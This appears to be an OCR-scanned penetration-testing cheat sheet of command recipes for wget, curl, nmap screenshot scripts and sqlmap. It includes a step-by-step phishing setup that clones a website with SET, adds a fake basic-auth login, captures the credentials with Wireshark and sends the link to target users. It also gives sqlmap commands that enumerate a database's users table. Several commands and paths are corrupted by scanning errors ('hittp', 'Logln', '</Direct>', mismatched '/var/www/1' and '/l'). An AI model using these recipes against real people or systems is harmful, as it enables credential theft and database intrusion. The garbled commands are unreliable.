Firefox Type Conversions
| ASCII -> Base64 | javascript:btoa("ascii str") |
| Base64 -> ASCII | javascript:atob("base64==") |
| ASCII -> URI | javascript:encodeURI(" |
| URI -> ASCII | javascript:decodeURI("%3cscript%3E") |
(last edited: 08/14/2019) - Firefox Type Conversions - WGET - CURL - Basic Apache Auth - Automated Web Screenshots - SQLMap
| ASCII -> Base64 | javascript:btoa("ascii str") |
| Base64 -> ASCII | javascript:atob("base64==") |
| ASCII -> URI | javascript:encodeURI(" |
| URI -> ASCII | javascript:decodeURI("%3cscript%3E") |
wget -q --save-cookies=cookie.txt --keep-session-cookies --post- data="username:admin&password=pass&Logln=Login" http://(url)/login.phpTop - Home
curl -I -X HEAD -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" hittp://(iP)
curl -u user:pass -o outfile https://login.bob.com
curl ftp://user:pass@bob.com/directory/SEQUENT IAL LOOKUP
curl http://bob.com/file[1-10].txtTop - Home
The steps below will clone a website and redirect after 3 seconds to another page requiring basic authentication. It has proven very useful for collecting credentials during social engineering engagements.
1.
Start Social Engineering Tool kit (SET)
> /pentest/exploits/set/./set
2.
Through SET, use the 'Website Attack Vector' menu to clone your
preferred website. * Do not close SET *
3.
In a new terminal create a new directory (lowercase L)
> mkdir /var/www/1
4.
Browse to SET directory and copy the cloned site
> cd /pentest/exploits/set/src/web_clone/site/template/
> cp index.html /var/www/index.html
> cp index.html /var/www/l/index.html
5.
Open /var/www/index.html and add tag between (head) tags
meta http-equiv="refresh"
content="3;url=http://(domainlip)/l/index.html"/
6.
Create blank password file to be used for basic auth
> touch /etc/apache2/.htpasswd
7.
Open /etc/apache2/sites-available/default and add:
<Directory /var/www/1>
AuthType Basic
AuthName "PORTAL LOGIN BANNER"
AuthUserFile /etc/apache2/.htpasswd
Require user test
</Direct>
8.
Start Apache2
> /etc/init.d/apache2 start
9.
Start Wire shark and add the filter:
http.authbasic
10.
Send the following link to your target users
http://(domain|ip)/index.html
Top - Home
Install dependencies:
• wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rcl-static-i366.tar.bz2 • tar -jxvf wkhtmltoimage-0.11.0_rcl-static-i386.tar.bz2 • cp wkhtmltoimage-i386 /usr/local/bin/
Install Nmap module:
• git clone git://github.com/SpiderLabs/Nmap-Tools.git • cd Nmap-Tools/NSE/ • cp http-screenshot.nse /usr/local/share/nmap/scripts/ • nmap --script-updatedb
OS/version detection using screenshot script (screenshots saved as .png):
• nmap -A -script=http-screenshot -p80,443 1.1.1.0/24 -oA nmap-screengrab
Script will generate HTML preview page with all screenshots:
#!/bin/bash
printf "<HTML><BODY><BR>" > preview.html
ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3"A"$2"\" width=400><BR><BR>"}' >> preview.html printf "</BODY></HTML>" >> preview.html
Install Dependencies:
• Download Phantomjs https://phantomjs.googlecode.com/files/phantomjs-1.9.2-linux-x86_64.tar.bz2 • Download PeepingTom git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git Extract and copy phantomjs from phantomjs-1.9.2-linux-x86_64.tar.bz2 and copy to peepingtom directory • Run PeepingTom python peepingtom.py http://<mytarget.com>Top - Home
./sqlmap.Py -u "http://<url>?id=1&str=val"
./sqlmap.py -u "http://<url>" --data="id=l&str=val"
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" -b --dbms="<mssql|mysql|oracle|postgres>"
1. Login and note cookie value (cookiel=vall, cookie2=val2) ./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --cookie="cookie1=val1;cookie2=val2"
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" -b --current-db --current-user
./sqlmap.py -u "http://<url>" --data="id=l&str=val" -p "id" --tables -D "testdb"
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --columns -T "users"Top - Home